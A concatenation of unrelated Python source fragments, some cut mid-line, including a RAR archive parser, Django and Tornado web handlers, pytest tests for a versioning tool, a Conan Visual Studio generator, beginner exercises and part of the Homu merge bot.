textHandler(UInt8(s, "version", "RAR version needed to extract file"), formatRARVersion) yield Enum(UInt8(s, "method", "Packing method"), COMPRESSION_NAME) yield filesizeHandler(UInt16(s, "filename_length", "File name size")) if s["host_os"].value in (OS_MSDOS, OS_WIN32): yield MSDOSFileAttr32(s, "file_attr", "File attributes") else: yield textHandler(UInt32(s, "file_attr", "File attributes"), hexadecimal) # Start additional field from unrar if s["flags/is_large"].value: yield filesizeHandler(UInt64(s, "large_size", "Extended 64bits filesize")) # End additional field size = s["filename_length"].value if size > 0: if s["flags/is_unicode"].value: charset = "UTF-8" else: charset = "ISO-8859-15" yield String(s, "filename", size, "Filename", charset=charset) # Start additional fields from unrar - file only if is_file: if s["flags/has_salt"].value: yield RawBytes(s, "salt", 8, "Encryption salt to increase security") if s["flags/has_ext_time"].value: yield ExtTime(s, "extra_time") def fileHeader(s): return specialHeader(s, True) def fileBody(s): # File compressed data size = s["compressed_size"].value if s["flags/is_large"].value: size += s["large_size"].value if size > 0: yield RawBytes(s, "compressed_data", size, "File compressed data") def fileDescription(tag): def _fileDescription(s): return "%s: %s (%s)" % \ (tag, s["filename"].display, s["compressed_size"].display) return _fileDescription def newSubHeader(s): return specialHeader(s, False) class EndFlags(StaticFieldSet): format = ( (Bit, "has_next_vol", "Whether there is another next volume"), (Bit, "has_data_crc", "Whether a CRC value is present"), (Bit, "rev_space"), (Bit, "has_vol_number", "Whether the volume number is present"), (NullBits, "unused[]", 10), ) + commonFlags def endFlags(s): yield EndFlags(s, "flags", "End block flags") class BlockFlags(StaticFieldSet): static_size = 16 format = ( (NullBits, "unused[]", 14), ) + commonFlags class Block(FieldSet): BLOCK_INFO = { # None means 'use default function' 0x72: ("marker", "File format marker", markerFlags, None, None), 0x73: ("archive_start", "Archive info", archiveFlags, archiveHeader, None), 0x74: ("file[]", fileDescription("File entry"), fileFlags, fileHeader, fileBody), 0x75: ("comment[]", "Comment", None, commentHeader, commentBody), 0x76: ("av_info[]", "Extra information", None, avInfoHeader, avInfoBody), 0x77: ("sub_block[]", fileDescription("Subblock"), None, newSubHeader, fileBody), 0x78: ("recovery[]", "Recovery block", None, recoveryHeader, None), 0x79: ("signature", "Signature block", None, signatureHeader, None), 0x7A: ("sub_block[]", fileDescription("New-format subblock"), fileFlags, newSubHeader, fileBody), 0x7B: ("archive_end", "Archive end block", endFlags, None, None), } def __init__(self, parent, name): FieldSet.__init__(self, parent, name) t = self["block_type"].value if t in self.BLOCK_INFO: self._name, desc, parseFlags, parseHeader, parseBody = self.BLOCK_INFO[t] if callable(desc): self.createDescription = lambda: desc(self) elif desc: self._description = desc if parseFlags : self.parseFlags = lambda: parseFlag
# -*- coding:utf-8 -*- import copy from zope.interface import implementer from .interfaces import ( IExecutor, ISchemaValidation, IDataValidation, ICreate, IDelete, IEdit ) from alchemyjsonschema.dictify import ( normalize, validate_all, ErrorFound ) from jsonschema import FormatChecker from jsonschema.validators import Draft4Validator class ValidationError(Exception): pass @implementer(IExecutor) class Executor(object): def __init__(self, context, params): self.context = context self.raw_params = params self.params = None def validation(self, ob=None): raise NotImplemented def execute(self, ob=None): raise NotImplemented def default_validation(self, iface, ob=None, name=""): fn = self.context.customized_or_default(iface, ISchemaValidation, name=name) params = fn(self.context, self.raw_params) fn2 = self.context.customized_or_default(iface, IDataValidation, name=name) fn2(self.context, params, ob) return params class CreateExecutor(Executor): def validation(self, ob=None): self.params = default_validation(self, ICreate, ob) def execute(self, ob=None): if self.params is None: raise RuntimeError("execute after validation") ob = self.context.modelclass(**self.params) self.context.session.add(ob) self.context.session.flush() return ob class EditExecutor(Executor): def validation(self, ob=None): self.params = default_validation(self, IEdit, ob) def execute(self, ob): if self.params is None: raise RuntimeError("execute after validation") for k, v in self.params.items(): setattr(ob, k, v) self.context.session.add(ob) return ob class DeleteExecutor(Executor): def validation(self, ob=None): self.params = default_validation(self, IDelete, ob) def execute(self, ob): self.context.session.delete(ob) return ob def create_jsonschema_validation(context, params, ob=None): def customize_schema(schema): schema = copy.deepcopy(schema) # when creating model, id is not needed. if "id" in schema["required"]: schema["required"].remove("id") if "id" in schema["properties"]: schema["properties"].pop("id") return schema schema = customize_schema(context.schema) schema_validator = Draft4Validator(schema, format_checker=FormatChecker()) t
ry: validate_all(params, schema_validator) except ErrorFound as err: raise ValidationError({e.path[0]: e.message for e in err.errors}) return normalize(params, schema) def edit_jsonschema_validation(context, params): schema = context.schema schema_validator = Draft4Validator(schema, format_checker=FormatChecker()) try: validate_all(params, schema_validator) except ErrorFound as err: raise ValidationError({e.path[
0]: e.message for e in err.errors}) return normalize(params, schema) def delete_jsonschema_validation(context, params): return params
# -*- coding: utf-8 -*- # Copyright © 2014-2016 Digital Catapult and The Copyright Hub Foundation # (together the Open Permissions Platform Coalition) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is dist
ributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details.
# # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # """API Roles handler. Allows to create and modify roles """ from koi import auth from perch import Token, User from tornado.gen import coroutine from .base import BaseHandler class RolesHandler(BaseHandler): """Responsible for managing role resources """ @auth.auth_required(Token.valid) @coroutine def get(self): """Get all roles""" roles = {x.value for x in User.roles} result = [{'id': x, 'name': x.title()} for x in roles] self.finish({ 'status': 200, 'data': result })
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2017-07-05 10:03 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('account', '0003_auto_20170705_0958'), ] operations = [ migrations.RenameField( model_name='oauthtoken', old_name='renew_token', new_name='refresh_token', ), migrations.RenameField( model
_name='oauthtoken',
old_name='renew_token_expiration', new_name='refresh_token_expiration', ), ]
import logging import sys from cliff.app import App from cliff.commandmanager import CommandManager # from .utils import ColorLogFormatter from nicelog.formatters import ColorLineFormatter class HarvesterApp(App): logger = logging.getLogger(__name__) def __init__(self): super(HarvesterApp, self).__init__( description='Harvester application CLI', version='0.1', command_manager=CommandManager('harvester.commands')) def configure_logging(self): """ Create logging handlers for any log output. Modified version to set custom formatter for console """ root_logger = logging.getLogger('') root_logger.setLevel(logging.DEBUG) # Set up logging to a file if self.options.log_file: file_handler = logging.FileHandler( filename=self.options.log_file, ) formatter = logging.Formatter(self.LOG_FILE_MESSAGE_FORMAT) file_handler.setFormatter(formatter) root_logger.addHandler(file_handler) # Always send higher-level messages to the console via stderr console = logging.StreamHandler(self.stderr) console_level = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG, }.get(self
.options.verbose_level, logging.DEBUG) console.setLevel(console_level) # formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT) formatter = ColorLineFormatter( show_date=True, show_function=True, show_filename=True) console
.setFormatter(formatter) root_logger.addHandler(console) return def main(argv=sys.argv[1:]): myapp = HarvesterApp() return myapp.run(argv) if __name__ == '__main__': sys.exit(main())
# -*- coding: utf-8 -*- vim:fileencoding=utf-8: # vim: tabstop=4:shiftwidth=4:softtabstop=4:expandtab # Copyright © 2010-2012 Greek Research and Technology Network (GRNET S.A.) # # Permission to use, copy, modify, and/or dis
tribute this software for any # purpose
with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD # TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND # FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, # OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF # USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER # TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE # OF THIS SOFTWARE. ''' Module containing dummy implementations of django management commands Idea is to be able to use it for unit tests and as a reference ''' def power_on(hostname, username, password, **kwargs): ''' Power on command ''' return True def power_off(hostname, username, password, **kwargs): ''' Power off command ''' return True def power_off_acpi(hostname, username, password, **kwargs): ''' Power off using ACPI command ''' return True def power_cycle(hostname, username, password, **kwargs): ''' Cold boot command ''' return True def power_reset(hostname, username, password, **kwargs): ''' Warm boot command ''' return True def pass_change(hostname, username, password, **kwargs): ''' Change BMC password ''' return True def set_settings(hostname, username, password, **kwargs): ''' Set BMC settings ''' return True def set_ldap_settings(hostname, username, password, **kwargs): ''' Set BMC LDAP settings ''' return True def boot_order(hostname, username, password, **kwargs): ''' Set boot order ''' return True def license_set(hostname, username, password, **kwargs): ''' Set BMC License ''' return True def bmc_reset(hostname, username, password, **kwargs): ''' Reset BMC ''' return True def bmc_factory_defaults(hostname, username, password, **kwargs): ''' Reset BMC to factory defaults ''' return True def add_user(hostname, username, password, **kwargs): ''' Add a user to the BMC ''' return True def remove_user(hostname, username, password, **kwargs): ''' Remove a User from the BMC ''' return True def get_all_users(hostname, username, password, **kwargs): ''' Get a list of all configured users on the BMC ''' return True def firmware_update(hostname, username, password, **kwargs): ''' Performs a firmware update of the BMC ''' return True
hidd
enimports = ['decim
al']
#Problem 1: #Python provides a built-in function called len th
at returns the length of a string #so the value of len('allen') is 5. #Write a function named right_justify that takes a string named s as a parameter and prints #the string with enough leading spaces so that the last letter of the string is in column 70 #of the display. #word = raw_input('Type a word to send over there ---->\n') def right_justify(word): print " " * (70 - len(word)) + word #right_justify(word) #Problem 2: #1
. Type this example into a script and test it: #def do_twice(f): #f() #f() #2. Modify do_twice so that it takes two arguments, a function object and a value, #and calls the function twice, passing the value as an argument. #3. Write a more general version of print_spam, called print_twice, that takes a #string as a parameter and prints it twice. #4. Use the modified version of do_twice to call print_twice twice, passing 'spam' #as an argument. #5. Define a new function called do_four that takes a function object and a value #and calls the function four times, passing the value as a parameter. There should #be only two statements in the body of this function, not four. word = raw_input('Type a word to repeat\n') string = raw_input('Type something here\n') def do_twice(f, word): print_twice('spam') print_twice('spam') def print_spam(word): print word def print_twice(string): print string print string def do_four(f, word): do_twice(string, word) do_twice(string, word) do_four(print_twice, 'spam') print ''
impor
t pytest from
punch import vcs_configuration as vc @pytest.fixture def global_variables(): return { 'serializer': '{{ major }}.{{ minor }}.{{ patch }}', 'mark': 'just a mark' } @pytest.fixture def vcs_config_dict(): return { 'name': 'git', 'commit_message': "Version updated to {{ new_version }}", 'finish_release': True, 'options': { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', } } @pytest.fixture def vcs_config_dict_with_include_files(vcs_config_dict): vcs_config_dict['include_files'] = ['HISTORY.rst'] return vcs_config_dict @pytest.fixture def vcs_config_dict_with_include_all_files(vcs_config_dict): vcs_config_dict['include_all_files'] = True return vcs_config_dict @pytest.fixture def special_variables(): return { 'current_version': '1.2.3', 'new_version': '1.3.0' } def test_vcs_configuration_from_string( vcs_config_dict, global_variables, special_variables): vcsconf = vc.VCSConfiguration(vcs_config_dict['name'], vcs_config_dict['options'], global_variables, special_variables, vcs_config_dict['commit_message'] ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_string_with_include_files( vcs_config_dict_with_include_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration( vcs_config_dict_with_include_files['name'], vcs_config_dict_with_include_files['options'], global_variables, special_variables, vcs_config_dict_with_include_files['commit_message'], include_files=vcs_config_dict_with_include_files['include_files'] ) assert vcsconf.include_files == ['HISTORY.rst'] def test_vcs_configuration_from_string_with_include_all_files( vcs_config_dict_with_include_all_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration( vcs_config_dict_with_include_all_files['name'], vcs_config_dict_with_include_all_files['options'], global_variables, special_variables, vcs_config_dict_with_include_all_files['commit_message'], include_all_files=vcs_config_dict_with_include_all_files[ 'include_all_files'] ) assert vcsconf.include_all_files is True def test_vcs_configuration_from_dict( vcs_config_dict, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_with_include_files( vcs_config_dict_with_include_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict_with_include_files, global_variables, special_variables ) assert vcsconf.include_files == ['HISTORY.rst'] def test_vcs_configuration_from_dict_with_include_all_files( vcs_config_dict_with_include_all_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict_with_include_all_files, global_variables, special_variables ) assert vcsconf.include_all_files is True def test_vcs_configuration_from_dict_without_commit_message( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('commit_message') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated 1.2.3 -> 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_without_finish_release( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('finish_release') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_without_options( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('options') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.finish_release is True def test_vcs_configuration_from_dict_can_use_global_variables( vcs_config_dict, global_variables, special_variables): vcs_config_dict['commit_message'] = "Mark: {{ mark }}" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.commit_message == "Mark: just a mark" def test_vcs_configuration_from_dict_special_variables_take_precedence( vcs_config_dict, global_variables, special_variables): vcs_config_dict['commit_message'] = "{{ current_version }}" global_variables['current_version'] = "5.0.0" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.commit_message == "1.2.3" def test_vcs_configuration_from_dict_options_templates_are_processed( vcs_config_dict, global_variables, special_variables): vcs_config_dict['options']['annotation_message'] = \ "Updated {{ current_version}} -> {{ new_version }}" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': 'Updated 1.2.3 -> 1.3.0', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.options == expected_options
from django.conf.urls.defaults import patterns # noqa fr
om django.conf.urls.defaults import url # noqa from openstack_dashboard.dashboards.fogbow.usage import views from openstack_dashboard.dashboards.fogbow.u
sage.views import IndexView urlpatterns = patterns('', url(r'^$', IndexView.as_view(), name='index'), url(r'^(?P<member_id>.*)/usage$', views.getSpecificMemberUsage, name='usage'), )
amework.exceptions import NotFound, ValidationError, PermissionDenied from modularodm import Q from modularodm.exceptions import NoResultsFound from api.base.exceptions import Gone from api.base import permissions as base_permissions from api.base.views import JSONAPIBaseView from api.comments.permissions import ( CommentDetailPermissions, CommentReportsPermissions ) from api.comments.serializers import ( CommentSerializer, CommentDetailSerializer, CommentReportSerializer, CommentReportDetailSerializer, CommentReport ) from framework.auth.core import Auth from framework.auth.oauth_scopes import CoreScopes from framework.exceptions import PermissionsError from website.project.model import Comment class CommentMixin(object): """Mixin with convenience methods for retrieving the current comment based on the current URL. By default, fetches the comment based on the comment_id kwarg. """ serializer_class = CommentSerializer comment_lookup_url_kwarg = 'comment_id' def get_comment(self, check_permissions=True): pk = self.kwargs[self.comment_lookup_url_kwarg] try: comment = Comment.find_one(Q('_id', 'eq', pk) & Q('root_target', 'ne', None)) except NoResultsFound: raise NotFound # Deleted root targets still appear as tuples in the database and are included in # the above query, requiring an additional check if comment.root_target.referent.is_deleted: comment.root_target = None comment.save() if comment.root_target is None: raise NotFound if check_permissions: # May raise a permission denied self.check_object_permissions(self.request, comment) return comment class CommentDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin): """Details about a specific comment. *Writeable*. ###Permissions Comments on public nodes are given read-only access to everyone. Comments on private nodes are only visible to contributors and administrators on the parent node. Only the user who created the comment has permission to edit and delete the comment. Note that if an anonymous view_only key is being used, the user relationship will not be exposed. ##Attributes OSF comment entities have the "comments" `type`. name type description ================================================================================= content string content of the comment date_created iso8601 timestamp timestamp that the comment was created date_modified iso8601 timestamp timestamp when the comment was last updated modified boolean has this comment been edited? deleted boolean is this comment deleted? is_abuse boolean has this comment been reported by the current user? has_children boolean does this comment have replies? can_edit boolean can the current user edit this comment? ##Relationships ###User The user who created the comment. ###Node The project associated with this comment. ###Target The "parent" of the comment. If the comment was made on a node, the target is the node. If the comment is a reply, its target is the comment it was in reply to. ###Replies List of replies to this comment. New replies can be created through this endpoint. ###Reports List of spam reports for this comment. Only users with permission to create comments can access this endpoint, and users can only see reports that they have created. ##Links self: the canonical api endpoint of this comment ##Actions ###Update Method: PUT / PATCH URL: /links/self Query Params: <none> Body (JSON): { "data": { "type": "comments", # required "id": {comment_id}, # required "attributes": { "content": {content}, # mandatory "deleted": {is_deleted}, # mandatory } } } Success: 200 OK + comment representation To update a comment, issue either a PUT or a PATCH request against the `/links/self` URL. The `content` and `deleted` fields are mandatory if you PUT and optional if you PATCH. Non-string values will be accept
ed and stringified, but we make no promises about the stringification output. So don't do that. To restore a deleted comment, issue a PATCH request against the `/links/self` URL, with `deleted: False`. ###Delete Method: DELETE URL: /link
s/self Query Params: <none> Success: 204 No Content To delete a comment send a DELETE request to the `/links/self` URL. Nothing will be returned in the response body. Attempting to delete an already deleted comment will result in a 400 Bad Request response. ##Query Params *None*. #This Request/Response """ permission_classes = ( drf_permissions.IsAuthenticatedOrReadOnly, CommentDetailPermissions, base_permissions.TokenHasScope, ) required_read_scopes = [CoreScopes.NODE_COMMENTS_READ] required_write_scopes = [CoreScopes.NODE_COMMENTS_WRITE] serializer_class = CommentDetailSerializer view_category = 'comments' view_name = 'comment-detail' # overrides RetrieveAPIView def get_object(self): return self.get_comment() def perform_destroy(self, instance): auth = Auth(self.request.user) if instance.is_deleted: raise ValidationError('Comment already deleted.') else: try: instance.delete(auth, save=True) except PermissionsError: raise PermissionDenied('Not authorized to delete this comment.') class CommentReportsList(JSONAPIBaseView, generics.ListCreateAPIView, CommentMixin): """List of reports made for a comment. *Writeable*. Paginated list of reports for a comment. Each resource contains the full representation of the report, meaning additional requests to an individual comment's report detail view are not necessary. ###Permissions The comment reports endpoint can only be viewed by users with permission to comment on the node. Users are only shown comment reports that they have made. ##Attributes OSF comment report entities have the "comment_reports" `type`. name type description ===================================================================================== category string the type of spam, must be one of the allowed values message string description of why the comment was reported ##Links See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination). ##Actions ###Create Method: POST URL: /links/self Query Params: <none> Body (JSON): { "data": { "type": "comment_reports", # required "attributes": { "category": {category}, # mandatory "message": {text}, # optional } } } Success: 201 CREATED + comment report representation To create a report for this comment, issue a POST request against this endpoint. The `category` field is mandatory, and must be one of the following: "spam", "hate" or "violence" . The `message` field is optional. If the comment report creation is successful the API will return a 201 response with the repres
from vsg.vhdlFile.extract import tokens def get_n_token_after_tokens(iToken, lTokens, lAllTokens, oTokenMap): lReturn = [] lIndexes = [] for oToken in lTokens: lTemp = oTokenMap.get_token_indexes(oToken) for iTemp in lTemp: iTokenIndex = iTemp for iCount in range(0, iToken): iTokenIndex = oTokenMap.get_index_of_next_non_whitespace_token(iTokenIndex, bExcludeComments=True) lIndexes.append(iTokenIndex) lIndexes.sort() for iIndex in lIndexes: iLine =
oTokenMap.get_line_number_of_index(iIndex) lReturn.append(tokens.New(iIndex, iLine, [lAllTokens[iIndex]])) return lReturn
#!/usr/bin/en
v python3 number = 23 guess = int(input('Enter an integer : ')) if guess == number: # 新块从这里开始 print('Congratulations, you guessed it.') print('(but you do not win any pizzas!)') # 新块在这里结束 elif guess < number: # 另一代码块 print('No, it is a little higher than tha
t') # 你可以在此做任何你希望在该代码块内进行的事情 else: print('No, it is a little lower than that') # 你必须通过猜测一个大于(>)设置数的数字来到达这里 print('Done') # 这最后一句语句将在 # if 语句执行完毕后执行。
import os import re from conans.model import Generator from conans.paths import BUILD_INFO_VISUAL_STUDIO from conans.client.tools.files import VALID_LIB_EXTENSIONS class VisualStudioGenerator(Generator): template = '''<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ImportGroup Label="PropertySheets" /> <PropertyGroup Label="UserMacros" /> <PropertyGroup Label="Conan-RootDirs">{item_properties} </PropertyGroup> {properties} <ItemGroup /> </Project>''' properties_template = '''<PropertyGroup Label="ConanVariables"{condition}> <ConanPackageName>{conan_package_name}</ConanPackageName> <ConanPackageVersion>{conan_package_version}</ConanPackageVersion> <ConanCompilerFlags>{compiler_flags}</ConanCompilerFlags> <ConanLinkerFlags>{linker_flags}</ConanLinkerFlags> <ConanPreprocessorDefinitions>{definitions}</ConanPreprocessorDefinitions> <ConanIncludeDirectories>{include_dirs}</ConanIncludeDirectories> <ConanResourceDirectories>{res_dirs}</ConanResourceDirectories> <ConanLibraryDirectories>{lib_dirs}</ConanLibraryDirectories> <ConanBinaryDirectories>{bin_dirs}</ConanBinaryDirectories> <ConanLibraries>{libs}</ConanLibraries> <ConanSystemDeps>{system_libs}</ConanSystemDeps> </PropertyGroup> <PropertyGroup{condition}> <LocalDebuggerEnvironment>PATH=%PATH%
;{bin_dirs}</LocalDebuggerEnvironment> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> </PropertyGroup> <ItemDefinitionGroup{condition}> <ClCompile> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <P
reprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions> <AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions> </ClCompile> <Link> <AdditionalLibraryDirectories>$(ConanLibraryDirectories)%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> <AdditionalDependencies>$(ConanLibraries)%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(ConanSystemDeps)%(AdditionalDependencies)</AdditionalDependencies> <AdditionalOptions>$(ConanLinkerFlags) %(AdditionalOptions)</AdditionalOptions> </Link> <Midl> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> </Midl> <ResourceCompile> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions> <AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions> </ResourceCompile> </ItemDefinitionGroup>''' item_template = ''' <Conan-{name}-Root>{root_dir}</Conan-{name}-Root>''' def _format_items(self): sections = [] for dep_name, cpp_info in self._deps_build_info.dependencies: fields = { 'root_dir': cpp_info.rootpath, 'name': dep_name.replace(".", "-") } section = self.item_template.format(**fields) sections.append(section) return "".join(sections) @property def filename(self): return BUILD_INFO_VISUAL_STUDIO def _format_properties(self, build_info, condition): def has_valid_ext(lib): ext = os.path.splitext(lib)[1] return ext in VALID_LIB_EXTENSIONS fields = { 'conan_package_name': self.conanfile.name if self.conanfile.name else "", 'conan_package_version': self.conanfile.version if self.conanfile.version else "", 'condition': condition, 'bin_dirs': "".join("%s;" % p for p in build_info.bin_paths), 'res_dirs': "".join("%s;" % p for p in build_info.res_paths), 'include_dirs': "".join("%s;" % p for p in build_info.include_paths), 'lib_dirs': "".join("%s;" % p for p in build_info.lib_paths), 'libs': "".join(['%s.lib;' % lib if not has_valid_ext(lib) else '%s;' % lib for lib in build_info.libs]), 'system_libs': "".join(['%s.lib;' % sys_dep if not has_valid_ext(sys_dep) else '%s;' % sys_dep for sys_dep in build_info.system_libs]), 'definitions': "".join("%s;" % d for d in build_info.defines), 'compiler_flags': " ".join(build_info.cxxflags + build_info.cflags), 'linker_flags': " ".join(build_info.sharedlinkflags), 'exe_flags': " ".join(build_info.exelinkflags) } formatted_template = self.properties_template.format(**fields) return formatted_template @property def content(self): per_item_props = self._format_items() properties = [self._format_properties(self._deps_build_info, condition='')] for config, cpp_info in self._deps_build_info.configs.items(): condition = " Condition=\"'$(Configuration)' == '%s'\"" % config properties.append(self._format_properties(cpp_info, condition=condition)) fields = { 'item_properties': per_item_props, 'properties': '\n'.join(properties) } formatted_template = self.template.format(**fields) userprofile = os.getenv("USERPROFILE") if userprofile: userprofile = userprofile.replace("\\", "\\\\") formatted_template = re.sub(userprofile, "$(USERPROFILE)", formatted_template, flags=re.I) return formatted_template
'url': url, } db_query(self.db, 'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', [ self.repo_label, self.num, builder, res, url, self.merge_sha, ]) def build_res_summary(self): return ', '.join('{}: {}'.format(builder, data['res']) for builder, data in self.build_res.items()) def get_repo(self): repo = self.repos[self.repo_label] if not repo: self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name) assert repo.owner.login == self.owner assert repo.name == self.name return repo def save(self): db_query(self.db, 'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', [ self.repo_label, self.num, self.status, self.merge_sha, self.title, self.body, self.head_sha, self.head_ref, self.base_ref, self.assignee, self.approved_by, self.priority, self.try_, self.rollup, self.delegate, ]) def refresh(self): issue = self.get_repo().issue(self.num) self.title = issue.title self.body = issue.body def fake_merge(self, repo_cfg): if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False): msg = '''!!! Temporary commit !!! This commit is artifically made up to mark PR {} as merged. If this c
ommit remained in the history, you can safely reset HEAD to {}. This is possibly due to protected branches, which forbids force-pushing. You are advised
to turn off protected branches, or disable certain Homu features that require force-pushing, such as linear history or auto-squashing. [ci skip]'''.format(self.num, self.merge_sha) def inner(): # `merge()` will return `None` if the `head_sha` commit is already part of the `base_ref` branch, which means rebasing didn't have to modify the original commit merge_commit = self.get_repo().merge(self.base_ref, self.head_sha, msg) if merge_commit: self.fake_merge_sha = merge_commit.sha def fail(err): self.add_comment(':warning: Unable to mark this PR as merged. Closing instead. ({})'.format(err)) self.get_issue().close() utils.retry_until(inner, fail, self) def sha_cmp(short, full): return len(short) >= 4 and short == full[:len(short)] def sha_or_blank(sha): return sha if re.match(r'^[0-9a-f]+$', sha) else '' def parse_commands(body, username, repo_cfg, state, my_username, db, states, *, realtime=False, sha=''): try_only = False if username not in repo_cfg['reviewers'] and username != my_username: if username.lower() == state.delegate.lower(): pass # Allow users who have been delegated review powers elif username in repo_cfg.get('try_users', []): try_only = True else: return False state_changed = False words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x)) for i, word in reversed(list(enumerate(words))): found = True if word == 'r+' or word.startswith('r='): if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue if not sha and i+1 < len(words): cur_sha = sha_or_blank(words[i+1]) else: cur_sha = sha approver = word[len('r='):] if word.startswith('r=') else username # Ignore "r=me" if approver == 'me': continue # Sometimes, GitHub sends the head SHA of a PR as 0000000 through the webhook. This is # called a "null commit", and seems to happen when GitHub internally encounters a race # condition. Last time, it happened when squashing commits in a PR. In this case, we # just try to retrieve the head SHA manually. if all(x == '0' for x in state.head_sha): if realtime: state.add_comment(':bangbang: Invalid head SHA found, retrying: `{}`'.format(state.head_sha)) state.head_sha = state.get_repo().pull_request(state.num).head.sha state.save() assert any(x != '0' for x in state.head_sha) if state.approved_by and realtime and username != my_username: for _state in states[state.repo_label].values(): if _state.status == 'pending': break else: _state = None lines = [] if state.status in ['failure', 'error']: lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') if _state: if state == _state: lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') else: lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) if lines: lines.insert(0, '') lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') state.add_comment('\n'.join(lines)) if sha_cmp(cur_sha, state.head_sha): state.approved_by = approver state.save() elif realtime and username != my_username: if cur_sha: msg = '`{}` is not a valid commit SHA.'.format(cur_sha) state.add_comment(':scream_cat: {} Please try again with 